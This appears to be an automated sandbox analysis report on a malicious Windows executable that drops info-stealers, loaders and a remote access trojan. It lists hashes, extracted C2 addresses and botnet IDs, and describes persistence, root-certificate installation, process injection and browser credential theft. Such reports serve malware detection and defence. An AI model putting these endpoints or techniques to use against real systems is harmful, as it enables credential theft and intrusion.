fabookie | ced645d2249adc41f7340e1f9f76f576e336dc9c7c8affdb5b1e005faf528bd7

Resubmissions

14-07-2024 08:22

240714-j929savhlh 10

14-07-2024 07:28

240714-ja5kvstfnd 10

Analysis

max time kernel
134s
max time network
150s
platform
windows10-2004_x64
resource
win10v2004-20240709-en
resource tags

arch:x64arch:x86image:win10v2004-20240709-enlocale:en-usos:windows10-2004-x64system
submitted
14-07-2024 07:28

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

44de9a092646de93067a5ae63cdb87de_JaffaCakes118.exe
Size

4.9MB
MD5

44de9a092646de93067a5ae63cdb87de
SHA1

5db8c09d48e6e7602184634c1585d48f651d1197
SHA256

ced645d2249adc41f7340e1f9f76f576e336dc9c7c8affdb5b1e005faf528bd7
SHA512

2efd29a015b7d0986a879e47f2d93ef89f023f2f792404d253b241ceb2f8b7944f14e825f5eb1529ed7096506fb10fcde22d2e992553a8fe069dfa764a8a285a
SSDEEP

98304:FzzOsPu6locsuuFpSClTfqWrtCazwzs+CVGIOlmS23nlODn373muvk:pOSnlRvuOAmUwoQil4LWu8

Score

10^/10

fabookie gcleaner lgoogloader onlylogger redline sectoprat vidar 1 933 downloader execution infostealer loader persistence rat spyware stealer trojan

Malware Config

Extracted

Family

vidar

Version

41.1

Botnet

933

https://mas.to/@bardak1ho

Attributes

profile_id
933

Extracted

Family

gcleaner

gcl-page.biz

194.145.227.161

Extracted

Family

redline

Botnet

193.203.203.82:63852

Signatures

Detect Fabookie payload 1 IoCs

Processes:

resource	yara_rule
C:\Users\Admin\AppData\Local\Temp\jhuuee.exe	family_fabookie

Detects LgoogLoader payload 2 IoCs

Processes:

resource	yara_rule
behavioral2/memory/2628-41-0x00000000013C0000-0x00000000013D2000-memory.dmp	family_lgoogloader
behavioral2/memory/2628-50-0x00000000013C0000-0x00000000013D2000-memory.dmp	family_lgoogloader

Fabookie
Fabookie is facebook account info stealer.
spyware stealer fabookie
GCleaner
GCleaner is a Pay-Per-Install malware loader first discovered in early 2019.
loader gcleaner
LgoogLoader
A downloader capable of dropping and executing other malware families.
downloader lgoogloader
OnlyLogger
A tiny loader that uses IPLogger to get its payload.
loader onlylogger
RedLine
RedLine Stealer is a malware family written in C#, first appearing in early 2020.
infostealer redline

RedLine payload 1 IoCs

Processes:

resource	yara_rule
behavioral2/memory/2260-279-0x0000000000400000-0x0000000000422000-memory.dmp	family_redline

SectopRAT
SectopRAT is a remote access trojan first seen in November 2019.
trojan rat sectoprat

SectopRAT payload 1 IoCs

Processes:

resource	yara_rule
behavioral2/memory/2260-279-0x0000000000400000-0x0000000000422000-memory.dmp	family_sectoprat

Vidar
Vidar is an infostealer based on Arkei stealer.
stealer vidar

OnlyLogger payload 1 IoCs

Processes:

resource	yara_rule
behavioral2/memory/3552-237-0x0000000000400000-0x000000000046A000-memory.dmp	family_onlylogger

Vidar Stealer 1 IoCs

stealer

Processes:

resource	yara_rule
behavioral2/memory/1992-236-0x0000000000400000-0x00000000004D7000-memory.dmp	family_vidar

Blocklisted process makes network request 1 IoCs

Processes:

rundll32.exe

flow pid process

122 3920 rundll32.exe
Command and Scripting Interpreter: PowerShell 1 TTPs 1 IoCs
Run Powershell to modify Windows Defender settings to add exclusions for file extensions, paths, and processes.
execution

PowerShell
T1059.001

Processes:

powershell.exe

pid process

1760 powershell.exe

flow	pid	process
122	3920	rundll32.exe

pid	process
1760	powershell.exe

Checks computer location settings 2 TTPs 13 IoCs

Looks up country code configured in the registry, likely geofence.

Query Registry

T1012

System Information Discovery

T1082

Processes:

44de9a092646de93067a5ae63cdb87de_JaffaCakes118.exemshta.exerundll32.exesfx_123_206.exesetup_2.tmpmshta.exeINSTAL~1.EXEservices64.exe4MCYlgNAW.eXErundll32.exemshta.exeChrome 5.exeinstall.exe

description	ioc	process
Key value queried	\REGISTRY\USER\S-1-5-21-1750093773-264148664-1320403265-1000\Control Panel\International\Geo\Nation	44de9a092646de93067a5ae63cdb87de_JaffaCakes118.exe
Key value queried	\REGISTRY\USER\S-1-5-21-1750093773-264148664-1320403265-1000\Control Panel\International\Geo\Nation	mshta.exe
Key value queried	\REGISTRY\USER\S-1-5-21-1750093773-264148664-1320403265-1000\Control Panel\International\Geo\Nation	rundll32.exe
Key value queried	\REGISTRY\USER\S-1-5-21-1750093773-264148664-1320403265-1000\Control Panel\International\Geo\Nation	sfx_123_206.exe
Key value queried	\REGISTRY\USER\S-1-5-21-1750093773-264148664-1320403265-1000\Control Panel\International\Geo\Nation	setup_2.tmp
Key value queried	\REGISTRY\USER\S-1-5-21-1750093773-264148664-1320403265-1000\Control Panel\International\Geo\Nation	mshta.exe
Key value queried	\REGISTRY\USER\S-1-5-21-1750093773-264148664-1320403265-1000\Control Panel\International\Geo\Nation	INSTAL~1.EXE
Key value queried	\REGISTRY\USER\S-1-5-21-1750093773-264148664-1320403265-1000\Control Panel\International\Geo\Nation	services64.exe
Key value queried	\REGISTRY\USER\S-1-5-21-1750093773-264148664-1320403265-1000\Control Panel\International\Geo\Nation	4MCYlgNAW.eXE
Key value queried	\REGISTRY\USER\S-1-5-21-1750093773-264148664-1320403265-1000\Control Panel\International\Geo\Nation	rundll32.exe
Key value queried	\REGISTRY\USER\S-1-5-21-1750093773-264148664-1320403265-1000\Control Panel\International\Geo\Nation	mshta.exe
Key value queried	\REGISTRY\USER\S-1-5-21-1750093773-264148664-1320403265-1000\Control Panel\International\Geo\Nation	Chrome 5.exe
Key value queried	\REGISTRY\USER\S-1-5-21-1750093773-264148664-1320403265-1000\Control Panel\International\Geo\Nation	install.exe

Executes dropped EXE 23 IoCs

Processes:

Chrome 5.exeinst001.exeDownFlSetup110.exeFirstoffer.exesetup.exeInstall.EXEinstall.exesfx_123_206.exe7.exesetup_2.exesetup_2.tmpjhuuee.exeliuyan-game.exesetup_2.exe11.exesetup_2.tmp4MCYlgNAW.eXEservices64.exeinstall.exeINSTAL~1.EXEsihost64.exee58e683.exee591beb.exe

pid	process
4184	Chrome 5.exe
2628	inst001.exe
5104	DownFlSetup110.exe
1992	Firstoffer.exe
3552	setup.exe
2704	Install.EXE
5048	install.exe
1088	sfx_123_206.exe
2236	7.exe
716	setup_2.exe
2272	setup_2.tmp
4452	jhuuee.exe
3608	liuyan-game.exe
4968	setup_2.exe
4284	11.exe
1736	setup_2.tmp
4844	4MCYlgNAW.eXE
748	services64.exe
2260	install.exe
5108	INSTAL~1.EXE
464	sihost64.exe
3404	e58e683.exe
3784	e591beb.exe

Loads dropped DLL 6 IoCs

Processes:

setup_2.tmpsetup_2.tmprundll32.exerundll32.exe

pid process

2272 setup_2.tmp
1736 setup_2.tmp
2640 rundll32.exe
2640 rundll32.exe
3920 rundll32.exe
3920 rundll32.exe
Reads user/profile data of web browsers 2 TTPs
Infostealers often target stored browser data, which can include saved credentials etc.
spyware stealer

Data from Local System
T1005

Credentials In Files
T1552.001

pid	process
2272	setup_2.tmp
1736	setup_2.tmp
2640	rundll32.exe
2640	rundll32.exe
3920	rundll32.exe
3920	rundll32.exe

Adds Run key to start application 2 TTPs 1 IoCs

persistence

Registry Run Keys / Startup Folder

T1547.001

Modify Registry

T1112

Processes:

Install.EXE

description	ioc	process
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\RunOnce\wextract_cleanup0 = "rundll32.exe C:\\Windows\\system32\\advpack.dll,DelNodeRunDLL32 \"C:\\Users\\Admin\\AppData\\Local\\Temp\\IXP000.TMP\\\""	Install.EXE

Legitimate hosting services abused for malware hosting/C2 1 TTPs 11 IoCs

Web Service

T1102

Processes:

flow	ioc
123	raw.githubusercontent.com
149	pastebin.com
10	iplogger.org
11	iplogger.org
14	iplogger.org
27	iplogger.org
71	iplogger.org
18	iplogger.org
74	iplogger.org
124	raw.githubusercontent.com
148	pastebin.com

Looks up external IP address via web service 1 IoCs
Uses a legitimate IP lookup service to find the infected system's external IP.

Processes:

flow ioc

15 ip-api.com

flow	ioc
15	ip-api.com

Suspicious use of SetThreadContext 2 IoCs

Processes:

install.exeservices64.exe

description	pid	process	target process
PID 5048 set thread context of 2260	5048	install.exe	install.exe
PID 748 set thread context of 3468	748	services64.exe	explorer.exe

Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).

System Information Discovery
T1082
Program crash 3 IoCs

Processes:

WerFault.exeWerFault.exeWerFault.exe

pid pid_target process target process

1224 1992 WerFault.exe Firstoffer.exe
3496 3404 WerFault.exe e58e683.exe
4956 3784 WerFault.exe e591beb.exe

pid	pid_target	process	target process
1224	1992	WerFault.exe	Firstoffer.exe
3496	3404	WerFault.exe	e58e683.exe
4956	3784	WerFault.exe	e591beb.exe

Enumerates system info in registry 2 TTPs 3 IoCs

Query Registry

T1012

System Information Discovery

T1082

Processes:

msedge.exe

description	ioc	process
Key opened	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS	msedge.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemManufacturer	msedge.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemProductName	msedge.exe

Kills process with taskkill 1 IoCs
evasion

Processes:

taskkill.exe

pid process

2016 taskkill.exe

pid	process
2016	taskkill.exe

Modifies system certificate store 2 TTPs 6 IoCs

evasion spyware trojan

Install Root Certificate

T1553.004

Modify Registry

T1112

Processes:

install.exe

description	ioc	process
Key created	\REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\D4DE20D05E66FC53FE1A50882C78DB2852CAE474	install.exe
Set value (data)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\D4DE20D05E66FC53FE1A50882C78DB2852CAE474\Blob = 0f0000000100000014000000ce0e658aa3e847e467a147b3049191093d055e6f53000000010000007f000000307d3020060a2b06010401b13e01640130123010060a2b0601040182373c0101030200c0301f06096086480186fd6c020130123010060a2b0601040182373c0101030200c0301b060567810c010130123010060a2b0601040182373c0101030200c0301b060567810c010330123010060a2b0601040182373c0101030200c009000000010000003e000000303c06082b0601050507030206082b0601050507030306082b0601050507030406082b0601050507030906082b0601050507030106082b060105050703080b0000000100000030000000440069006700690043006500720074002000420061006c00740069006d006f0072006500200052006f006f007400000062000000010000002000000016af57a9f676b0ab126095aa5ebadef22ab31119d644ac95cd4b93dbf3f26aeb140000000100000014000000e59d5930824758ccacfa085436867b3ab5044df01d0000000100000010000000918ad43a9475f78bb5243de886d8103c7f000000010000000c000000300a06082b060105050703097e000000010000000800000000c001b39667d601030000000100000014000000d4de20d05e66fc53fe1a50882c78db2852cae47420000000010000007b030000308203773082025fa0030201020204020000b9300d06092a864886f70d0101050500305a310b300906035504061302494531123010060355040a130942616c74696d6f726531133011060355040b130a43796265725472757374312230200603550403131942616c74696d6f7265204379626572547275737420526f6f74301e170d3030303531323138343630305a170d3235303531323233353930305a305a310b300906035504061302494531123010060355040a130942616c74696d6f726531133011060355040b130a43796265725472757374312230200603550403131942616c74696d6f7265204379626572547275737420526f6f7430820122300d06092a864886f70d01010105000382010f003082010a0282010100a304bb22ab983d57e826729ab579d429e2e1e89580b1b0e35b8e2b299a64dfa15dedb009056ddb282ece62a262feb488da12eb38eb219dc0412b01527b8877d31c8fc7bab988b56a09e773e81140a7d1ccca628d2de58f0ba650d2a850c328eaf5ab25878a9a961ca967b83f0cd5f7f952132fc21bd57070f08fc012ca06cb9ae1d9ca337a77d6f8ecb9f16844424813d2c0c2a4ae5e60feb6a605fcb4dd075902d459189863f5a563e0900c7d5db2067af385eaebd403ae5e843e5fff15ed69bcf939367275cf77524df3c9902cb93de5c923533f1f2498215c079929bdc63aece76e863a6b97746333bd681831f0788d76bffc9e8e5d2a86a74d90dc271a390203010001a3453043301d0603551d0e04160414e59d5930824758ccacfa085436867b3ab5044df030120603551d130101ff040830060101ff020103300e0603551d0f0101ff040403020106300d06092a864886f70d01010505000382010100850c5d8ee46f51684205a0ddbb4f27258403bdf764fd2dd730e3a41017ebda2929b6793f76f6191323b8100af958a4d46170bd04616a128a17d50abdc5bc307cd6e90c258d86404feccca37e38c637114feddd68318e4cd2b30174eebe755e07481a7f70ff165c84c07985b805fd7fbe6511a30fc002b4f852373904d5a9317a18bfa02af41299f7a34582e33c5ef59d9eb5c89e7c2ec8a49e4e08144b6dfd706d6b1a63bd64e61fb7cef0f29f2ebb1bb7f250887392c2e2e3168d9a3202ab8e18dde91011ee7e35ab90af3e30947ad0333da7650ff5fc8e9e62cf47442c015dbb1db532d247d2382ed0fe81dc326a1eb5ee3cd5fce7811d19c32442ea6339a9	install.exe
Set value (data)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\D4DE20D05E66FC53FE1A50882C78DB2852CAE474\Blob = 19000000010000001000000068cb42b035ea773e52ef50ecf50ec529030000000100000014000000d4de20d05e66fc53fe1a50882c78db2852cae4747e000000010000000800000000c001b39667d6017f000000010000000c000000300a06082b060105050703091d0000000100000010000000918ad43a9475f78bb5243de886d8103c140000000100000014000000e59d5930824758ccacfa085436867b3ab5044df062000000010000002000000016af57a9f676b0ab126095aa5ebadef22ab31119d644ac95cd4b93dbf3f26aeb0b0000000100000030000000440069006700690043006500720074002000420061006c00740069006d006f0072006500200052006f006f007400000009000000010000003e000000303c06082b0601050507030206082b0601050507030306082b0601050507030406082b0601050507030906082b0601050507030106082b0601050507030853000000010000007f000000307d3020060a2b06010401b13e01640130123010060a2b0601040182373c0101030200c0301f06096086480186fd6c020130123010060a2b0601040182373c0101030200c0301b060567810c010130123010060a2b0601040182373c0101030200c0301b060567810c010330123010060a2b0601040182373c0101030200c00f0000000100000014000000ce0e658aa3e847e467a147b3049191093d055e6f20000000010000007b030000308203773082025fa0030201020204020000b9300d06092a864886f70d0101050500305a310b300906035504061302494531123010060355040a130942616c74696d6f726531133011060355040b130a43796265725472757374312230200603550403131942616c74696d6f7265204379626572547275737420526f6f74301e170d3030303531323138343630305a170d3235303531323233353930305a305a310b300906035504061302494531123010060355040a130942616c74696d6f726531133011060355040b130a43796265725472757374312230200603550403131942616c74696d6f7265204379626572547275737420526f6f7430820122300d06092a864886f70d01010105000382010f003082010a0282010100a304bb22ab983d57e826729ab579d429e2e1e89580b1b0e35b8e2b299a64dfa15dedb009056ddb282ece62a262feb488da12eb38eb219dc0412b01527b8877d31c8fc7bab988b56a09e773e81140a7d1ccca628d2de58f0ba650d2a850c328eaf5ab25878a9a961ca967b83f0cd5f7f952132fc21bd57070f08fc012ca06cb9ae1d9ca337a77d6f8ecb9f16844424813d2c0c2a4ae5e60feb6a605fcb4dd075902d459189863f5a563e0900c7d5db2067af385eaebd403ae5e843e5fff15ed69bcf939367275cf77524df3c9902cb93de5c923533f1f2498215c079929bdc63aece76e863a6b97746333bd681831f0788d76bffc9e8e5d2a86a74d90dc271a390203010001a3453043301d0603551d0e04160414e59d5930824758ccacfa085436867b3ab5044df030120603551d130101ff040830060101ff020103300e0603551d0f0101ff040403020106300d06092a864886f70d01010505000382010100850c5d8ee46f51684205a0ddbb4f27258403bdf764fd2dd730e3a41017ebda2929b6793f76f6191323b8100af958a4d46170bd04616a128a17d50abdc5bc307cd6e90c258d86404feccca37e38c637114feddd68318e4cd2b30174eebe755e07481a7f70ff165c84c07985b805fd7fbe6511a30fc002b4f852373904d5a9317a18bfa02af41299f7a34582e33c5ef59d9eb5c89e7c2ec8a49e4e08144b6dfd706d6b1a63bd64e61fb7cef0f29f2ebb1bb7f250887392c2e2e3168d9a3202ab8e18dde91011ee7e35ab90af3e30947ad0333da7650ff5fc8e9e62cf47442c015dbb1db532d247d2382ed0fe81dc326a1eb5ee3cd5fce7811d19c32442ea6339a9	install.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\2B8F1B57330DBBA2D07A6C51F70EE90DDAB9AD8E	install.exe
Set value (data)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\2B8F1B57330DBBA2D07A6C51F70EE90DDAB9AD8E\Blob = 0400000001000000100000001bfe69d191b71933a372a80fe155e5b50f000000010000003000000066b764a96581128168cf208e374dda479d54e311f32457f4aee0dbd2a6c8d171d531289e1cd22bfdbbd4cfd979625483090000000100000054000000305206082b0601050507030206082b06010505070303060a2b0601040182370a030406082b0601050507030406082b0601050507030606082b0601050507030706082b0601050507030106082b0601050507030853000000010000004300000030413022060c2b06010401b231010201050130123010060a2b0601040182373c0101030200c0301b060567810c010330123010060a2b0601040182373c0101030200c0620000000100000020000000e793c9b02fd8aa13e21c31228accb08119643b749c898964b1746d46c3d4cbd21400000001000000140000005379bf5aaa2b4acf5480e1d89bc09df2b20366cb1d0000000100000010000000885010358d29a38f059b028559c95f900b00000001000000100000005300650063007400690067006f0000000300000001000000140000002b8f1b57330dbba2d07a6c51f70ee90ddab9ad8e190000000100000010000000ea6089055218053dd01e37e1d806eedf2000000001000000e2050000308205de308203c6a003020102021001fd6d30fca3ca51a81bbc640e35032d300d06092a864886f70d01010c0500308188310b3009060355040613025553311330110603550408130a4e6577204a6572736579311430120603550407130b4a65727365792043697479311e301c060355040a131554686520555345525452555354204e6574776f726b312e302c06035504031325555345525472757374205253412043657274696669636174696f6e20417574686f72697479301e170d3130303230313030303030305a170d3338303131383233353935395a308188310b3009060355040613025553311330110603550408130a4e6577204a6572736579311430120603550407130b4a65727365792043697479311e301c060355040a131554686520555345525452555354204e6574776f726b312e302c06035504031325555345525472757374205253412043657274696669636174696f6e20417574686f7269747930820222300d06092a864886f70d01010105000382020f003082020a028202010080126517360ec3db08b3d0ac570d76edcd27d34cad508361e2aa204d092d6409dcce899fcc3da9ecf6cfc1dcf1d3b1d67b3728112b47da39c6bc3a19b45fa6bd7d9da36342b676f2a93b2b91f8e26fd0ec162090093ee2e874c918b491d46264db7fa306f188186a90223cbcfe13f087147bf6e41f8ed4e451c61167460851cb8614543fbc33fe7e6c9cff169d18bd518e35a6a766c87267db2166b1d49b7803c0503ae8ccf0dcbc9e4cfeaf0596351f575ab7ffcef93db72cb6f654ddc8e7123a4dae4c8ab75c9ab4b7203dca7f2234ae7e3b68660144e7014e46539b3360f794be5337907343f332c353efdbaafe744e69c76b8c6093dec4c70cdfe132aecc933b517895678bee3d56fe0cd0690f1b0ff325266b336df76e47fa7343e57e0ea566b1297c3284635589c40dc19354301913acd37d37a7eb5d3a6c355cdb41d712daa9490bdfd8808a0993628eb566cf2588cd84b8b13fa4390fd9029eeb124c957cf36b05a95e1683ccb867e2e8139dcc5b82d34cb3ed5bffdee573ac233b2d00bf3555740949d849581a7f9236e651920ef3267d1c4d17bcc9ec4326d0bf415f40a94444f499e757879e501f5754a83efd74632fb1506509e658422e431a4cb4f0254759fa041e93d426464a5081b2debe78b7fc6715e1c957841e0f63d6e962bad65f552eea5cc62808042539b80e2ba9f24c971c073f0d52f5edef2f820f0203010001a3423040301d0603551d0e041604145379bf5aaa2b4acf5480e1d89bc09df2b20366cb300e0603551d0f0101ff040403020106300f0603551d130101ff040530030101ff300d06092a864886f70d01010c050003820201005cd47c0dcff7017d4199650c73c5529fcbf8cf99067f1bda43159f9e0255579614f1523c27879428ed1f3a0137a276fc5350c0849bc66b4eba8c214fa28e556291f36915d8bc88e3c4aa0bfdefa8e94b552a06206d55782919ee5f305c4b241155ff249a6e5e2a2bee0b4d9f7ff70138941495430709fb60a9ee1cab128ca09a5ea7986a596d8b3f08fbc8d145af18156490120f73282ec5e2244efc58ecf0f445fe22b3eb2f8ed2d9456105c1976fa876728f8b8c36afbf0d05ce718de6a66f1f6ca67162c5d8d083720cf16711890c9c134c7234dfbcd571dfaa71dde1b96c8c3c125d65dabd5712b6436bffe5de4d661151cf99aeec17b6e871918cde49fedd3571a21527941ccf61e326bb6fa36725215de6dd1d0b2e681b3b82afec836785d4985174b1b9998089ff7f78195c794a602e9240ae4c372a2cc9c762c80e5df7365bcae0252501b4dd1a079c77003fd0dcd5ec3dd4fabb3fcc85d66f7fa92ddfb902f7f5979ab535dac367b0874aa9289e238eff5c276be1b04ff307ee002ed45987cb524195eaf447d7ee6441557c8d590295dd629dc2b9ee5a287484a59bb790c70c07dff589367432d628c1b0b00be09c4cc31cd6fce369b54746812fa282abd3634470c48dff2d33baad8f7bb57088ae3e19cf4028d8fcc890bb5d9922f552e658c51f883143ee881dd7c68e3c436a1da718de7d3d16f162f9ca90a8fd	install.exe
Set value (data)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\2B8F1B57330DBBA2D07A6C51F70EE90DDAB9AD8E\Blob = 5c000000010000000400000000100000190000000100000010000000ea6089055218053dd01e37e1d806eedf0300000001000000140000002b8f1b57330dbba2d07a6c51f70ee90ddab9ad8e0b00000001000000100000005300650063007400690067006f0000001d0000000100000010000000885010358d29a38f059b028559c95f901400000001000000140000005379bf5aaa2b4acf5480e1d89bc09df2b20366cb620000000100000020000000e793c9b02fd8aa13e21c31228accb08119643b749c898964b1746d46c3d4cbd253000000010000004300000030413022060c2b06010401b231010201050130123010060a2b0601040182373c0101030200c0301b060567810c010330123010060a2b0601040182373c0101030200c0090000000100000054000000305206082b0601050507030206082b06010505070303060a2b0601040182370a030406082b0601050507030406082b0601050507030606082b0601050507030706082b0601050507030106082b060105050703080f000000010000003000000066b764a96581128168cf208e374dda479d54e311f32457f4aee0dbd2a6c8d171d531289e1cd22bfdbbd4cfd9796254830400000001000000100000001bfe69d191b71933a372a80fe155e5b52000000001000000e2050000308205de308203c6a003020102021001fd6d30fca3ca51a81bbc640e35032d300d06092a864886f70d01010c0500308188310b3009060355040613025553311330110603550408130a4e6577204a6572736579311430120603550407130b4a65727365792043697479311e301c060355040a131554686520555345525452555354204e6574776f726b312e302c06035504031325555345525472757374205253412043657274696669636174696f6e20417574686f72697479301e170d3130303230313030303030305a170d3338303131383233353935395a308188310b3009060355040613025553311330110603550408130a4e6577204a6572736579311430120603550407130b4a65727365792043697479311e301c060355040a131554686520555345525452555354204e6574776f726b312e302c06035504031325555345525472757374205253412043657274696669636174696f6e20417574686f7269747930820222300d06092a864886f70d01010105000382020f003082020a028202010080126517360ec3db08b3d0ac570d76edcd27d34cad508361e2aa204d092d6409dcce899fcc3da9ecf6cfc1dcf1d3b1d67b3728112b47da39c6bc3a19b45fa6bd7d9da36342b676f2a93b2b91f8e26fd0ec162090093ee2e874c918b491d46264db7fa306f188186a90223cbcfe13f087147bf6e41f8ed4e451c61167460851cb8614543fbc33fe7e6c9cff169d18bd518e35a6a766c87267db2166b1d49b7803c0503ae8ccf0dcbc9e4cfeaf0596351f575ab7ffcef93db72cb6f654ddc8e7123a4dae4c8ab75c9ab4b7203dca7f2234ae7e3b68660144e7014e46539b3360f794be5337907343f332c353efdbaafe744e69c76b8c6093dec4c70cdfe132aecc933b517895678bee3d56fe0cd0690f1b0ff325266b336df76e47fa7343e57e0ea566b1297c3284635589c40dc19354301913acd37d37a7eb5d3a6c355cdb41d712daa9490bdfd8808a0993628eb566cf2588cd84b8b13fa4390fd9029eeb124c957cf36b05a95e1683ccb867e2e8139dcc5b82d34cb3ed5bffdee573ac233b2d00bf3555740949d849581a7f9236e651920ef3267d1c4d17bcc9ec4326d0bf415f40a94444f499e757879e501f5754a83efd74632fb1506509e658422e431a4cb4f0254759fa041e93d426464a5081b2debe78b7fc6715e1c957841e0f63d6e962bad65f552eea5cc62808042539b80e2ba9f24c971c073f0d52f5edef2f820f0203010001a3423040301d0603551d0e041604145379bf5aaa2b4acf5480e1d89bc09df2b20366cb300e0603551d0f0101ff040403020106300f0603551d130101ff040530030101ff300d06092a864886f70d01010c050003820201005cd47c0dcff7017d4199650c73c5529fcbf8cf99067f1bda43159f9e0255579614f1523c27879428ed1f3a0137a276fc5350c0849bc66b4eba8c214fa28e556291f36915d8bc88e3c4aa0bfdefa8e94b552a06206d55782919ee5f305c4b241155ff249a6e5e2a2bee0b4d9f7ff70138941495430709fb60a9ee1cab128ca09a5ea7986a596d8b3f08fbc8d145af18156490120f73282ec5e2244efc58ecf0f445fe22b3eb2f8ed2d9456105c1976fa876728f8b8c36afbf0d05ce718de6a66f1f6ca67162c5d8d083720cf16711890c9c134c7234dfbcd571dfaa71dde1b96c8c3c125d65dabd5712b6436bffe5de4d661151cf99aeec17b6e871918cde49fedd3571a21527941ccf61e326bb6fa36725215de6dd1d0b2e681b3b82afec836785d4985174b1b9998089ff7f78195c794a602e9240ae4c372a2cc9c762c80e5df7365bcae0252501b4dd1a079c77003fd0dcd5ec3dd4fabb3fcc85d66f7fa92ddfb902f7f5979ab535dac367b0874aa9289e238eff5c276be1b04ff307ee002ed45987cb524195eaf447d7ee6441557c8d590295dd629dc2b9ee5a287484a59bb790c70c07dff589367432d628c1b0b00be09c4cc31cd6fce369b54746812fa282abd3634470c48dff2d33baad8f7bb57088ae3e19cf4028d8fcc890bb5d9922f552e658c51f883143ee881dd7c68e3c436a1da718de7d3d16f162f9ca90a8fd	install.exe

Scheduled Task/Job: Scheduled Task 1 TTPs 2 IoCs
Schtasks is often used by malware for persistence or to perform post-infection execution.
persistence execution

Scheduled Task
T1053.005

Processes:

schtasks.exeschtasks.exe

pid process

3004 schtasks.exe
584 schtasks.exe

pid	process
3004	schtasks.exe
584	schtasks.exe

Suspicious behavior: EnumeratesProcesses 37 IoCs

Processes:

Chrome 5.exepowershell.exemsedge.exeidentity_helper.exeservices64.exeexplorer.exe

pid	process
4184	Chrome 5.exe
4184	Chrome 5.exe
1760	powershell.exe
1760	powershell.exe
1760	powershell.exe
3424	msedge.exe
3424	msedge.exe
2408	identity_helper.exe
2408	identity_helper.exe
748	services64.exe
748	services64.exe
3468	explorer.exe
3468	explorer.exe
3468	explorer.exe
3468	explorer.exe
3468	explorer.exe
3468	explorer.exe
3468	explorer.exe
3468	explorer.exe
3468	explorer.exe
3468	explorer.exe
3468	explorer.exe
3468	explorer.exe
3468	explorer.exe
3468	explorer.exe
3468	explorer.exe
3468	explorer.exe
3468	explorer.exe
3468	explorer.exe
3468	explorer.exe
3468	explorer.exe
3468	explorer.exe
3468	explorer.exe
3468	explorer.exe
3468	explorer.exe
3468	explorer.exe
3468	explorer.exe

Suspicious use of AdjustPrivilegeToken 9 IoCs

Processes:

DownFlSetup110.exe7.exe11.exetaskkill.exeChrome 5.exepowershell.exeservices64.exeexplorer.exe

description	pid	process
Token: SeDebugPrivilege	5104	DownFlSetup110.exe
Token: SeDebugPrivilege	2236	7.exe
Token: SeDebugPrivilege	4284	11.exe
Token: SeDebugPrivilege	2016	taskkill.exe
Token: SeDebugPrivilege	4184	Chrome 5.exe
Token: SeDebugPrivilege	1760	powershell.exe
Token: SeDebugPrivilege	748	services64.exe
Token: SeLockMemoryPrivilege	3468	explorer.exe
Token: SeLockMemoryPrivilege	3468	explorer.exe

Suspicious use of WriteProcessMemory 64 IoCs

Processes:

44de9a092646de93067a5ae63cdb87de_JaffaCakes118.exeInstall.EXEsetup_2.exesfx_123_206.exesetup_2.tmpsetup_2.exemshta.execmd.exe4MCYlgNAW.eXEmshta.exemshta.exe

description	pid	process	target process
PID 1400 wrote to memory of 4184	1400	44de9a092646de93067a5ae63cdb87de_JaffaCakes118.exe	Chrome 5.exe
PID 1400 wrote to memory of 4184	1400	44de9a092646de93067a5ae63cdb87de_JaffaCakes118.exe	Chrome 5.exe
PID 1400 wrote to memory of 2628	1400	44de9a092646de93067a5ae63cdb87de_JaffaCakes118.exe	inst001.exe
PID 1400 wrote to memory of 2628	1400	44de9a092646de93067a5ae63cdb87de_JaffaCakes118.exe	inst001.exe
PID 1400 wrote to memory of 2628	1400	44de9a092646de93067a5ae63cdb87de_JaffaCakes118.exe	inst001.exe
PID 1400 wrote to memory of 5104	1400	44de9a092646de93067a5ae63cdb87de_JaffaCakes118.exe	DownFlSetup110.exe
PID 1400 wrote to memory of 5104	1400	44de9a092646de93067a5ae63cdb87de_JaffaCakes118.exe	DownFlSetup110.exe
PID 1400 wrote to memory of 1992	1400	44de9a092646de93067a5ae63cdb87de_JaffaCakes118.exe	Firstoffer.exe
PID 1400 wrote to memory of 1992	1400	44de9a092646de93067a5ae63cdb87de_JaffaCakes118.exe	Firstoffer.exe
PID 1400 wrote to memory of 1992	1400	44de9a092646de93067a5ae63cdb87de_JaffaCakes118.exe	Firstoffer.exe
PID 1400 wrote to memory of 3552	1400	44de9a092646de93067a5ae63cdb87de_JaffaCakes118.exe	setup.exe
PID 1400 wrote to memory of 3552	1400	44de9a092646de93067a5ae63cdb87de_JaffaCakes118.exe	setup.exe
PID 1400 wrote to memory of 3552	1400	44de9a092646de93067a5ae63cdb87de_JaffaCakes118.exe	setup.exe
PID 1400 wrote to memory of 2704	1400	44de9a092646de93067a5ae63cdb87de_JaffaCakes118.exe	Install.EXE
PID 1400 wrote to memory of 2704	1400	44de9a092646de93067a5ae63cdb87de_JaffaCakes118.exe	Install.EXE
PID 2704 wrote to memory of 5048	2704	Install.EXE	install.exe
PID 2704 wrote to memory of 5048	2704	Install.EXE	install.exe
PID 2704 wrote to memory of 5048	2704	Install.EXE	install.exe
PID 1400 wrote to memory of 1088	1400	44de9a092646de93067a5ae63cdb87de_JaffaCakes118.exe	sfx_123_206.exe
PID 1400 wrote to memory of 1088	1400	44de9a092646de93067a5ae63cdb87de_JaffaCakes118.exe	sfx_123_206.exe
PID 1400 wrote to memory of 1088	1400	44de9a092646de93067a5ae63cdb87de_JaffaCakes118.exe	sfx_123_206.exe
PID 1400 wrote to memory of 2236	1400	44de9a092646de93067a5ae63cdb87de_JaffaCakes118.exe	7.exe
